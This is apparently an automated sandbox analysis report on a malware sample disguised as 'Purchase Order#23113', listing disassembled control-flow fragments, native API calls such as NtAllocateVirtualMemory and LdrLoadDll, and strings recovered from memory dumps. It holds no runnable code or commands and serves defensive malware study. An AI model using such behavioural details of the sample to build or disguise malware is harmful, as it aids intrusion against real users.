                                                                            control_flow_graph 3 41a40b-41a459 call 41af60 NtReadFile
                                                                            APIs
                                                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: 1JA$rMA$rMA
                                                                            • API String ID: 2738559852-782607585
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 204 41a53a-41a53b 205 41a501-41a539 call 41af60 call 1772e80 204->205 206 41a53d-41a53f 204->206 208 41a541-41a556 206->208 209 41a596-41a5b9 call 41af60 call 1772f90 206->209 211 41a55c-41a57d NtAllocateVirtualMemory 208->211 212 41a557 call 41af60 208->212 212->211
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 249 40acf0-40ad19 call 41cc50 252 40ad1b-40ad1e 249->252 253 40ad1f-40ad2d call 41d070 249->253 256 40ad3d-40ad4e call 41b4a0 253->256 257 40ad2f-40ad3a call 41d2f0 253->257 262 40ad50-40ad64 LdrLoadDll 256->262 263 40ad67-40ad6a 256->263 257->256 262->263
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 264 41a360-41a376 265 41a37c-41a3b1 NtCreateFile 264->265 266 41a377 call 41af60 264->266 266->265
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 267 41a35c-41a3b1 call 41af60 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 270 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: 6EA
                                                                            • API String ID: 1279760036-1400015478
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 219 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 228 40835c-40836e PostThreadMessageW 219->228 229 40838e-408392 219->229 230 408370-40838a call 40a480 228->230 231 40838d 228->231 230->231 231->229
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 234 408310-40831f 235 408328-40835a call 41ca00 call 40acf0 call 414e50 234->235 236 408323 call 41be60 234->236 243 40835c-40836e PostThreadMessageW 235->243 244 40838e-408392 235->244 236->235 245 408370-40838a call 40a480 243->245 246 40838d 243->246 245->246 246->244
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 273 41a7c2-41a7ea call 41af60 275 41a7ef-41a804 LookupPrivilegeValueW 273->275
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 276 41a66a-41a687 call 41af60 278 41a68c-41a6a1 RtlFreeHeap 276->278
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 279 41a670-41a686 280 41a68c-41a6a1 RtlFreeHeap 279->280 281 41a687 call 41af60 279->281 281->280
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LookupPrivilegeValue
                                                                            • String ID:
                                                                            • API String ID: 3899507212-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2160512332
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
                                                                            • Thread identifier, xrefs: 017A553A
                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
                                                                            • Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
                                                                            • 8, xrefs: 017A52E3
                                                                            • Invalid debug info address of this critical section, xrefs: 017A54B6
                                                                            • Critical section address., xrefs: 017A5502
                                                                            • corrupted critical section, xrefs: 017A54C2
                                                                            • Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
                                                                            • double initialized or corrupted critical section, xrefs: 017A5508
                                                                            • undeleted critical section in freed memory, xrefs: 017A542B
                                                                            • Critical section debug info address, xrefs: 017A541F, 017A552E
                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                            • API String ID: 0-2368682639
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
                                                                            • @, xrefs: 017A259B
                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4
                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                            • API String ID: 0-4009184096
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                            • API String ID: 0-2515994595
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 0-1700792311
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
                                                                            • AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
                                                                            • VerifierDlls, xrefs: 017B8CBD
                                                                            • HandleTraces, xrefs: 017B8C8F
                                                                            • VerifierDebug, xrefs: 017B8CA5
                                                                            • VerifierFlags, xrefs: 017B8C50
                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                            • API String ID: 0-3223716464
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-792281065
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • apphelp.dll, xrefs: 01726496
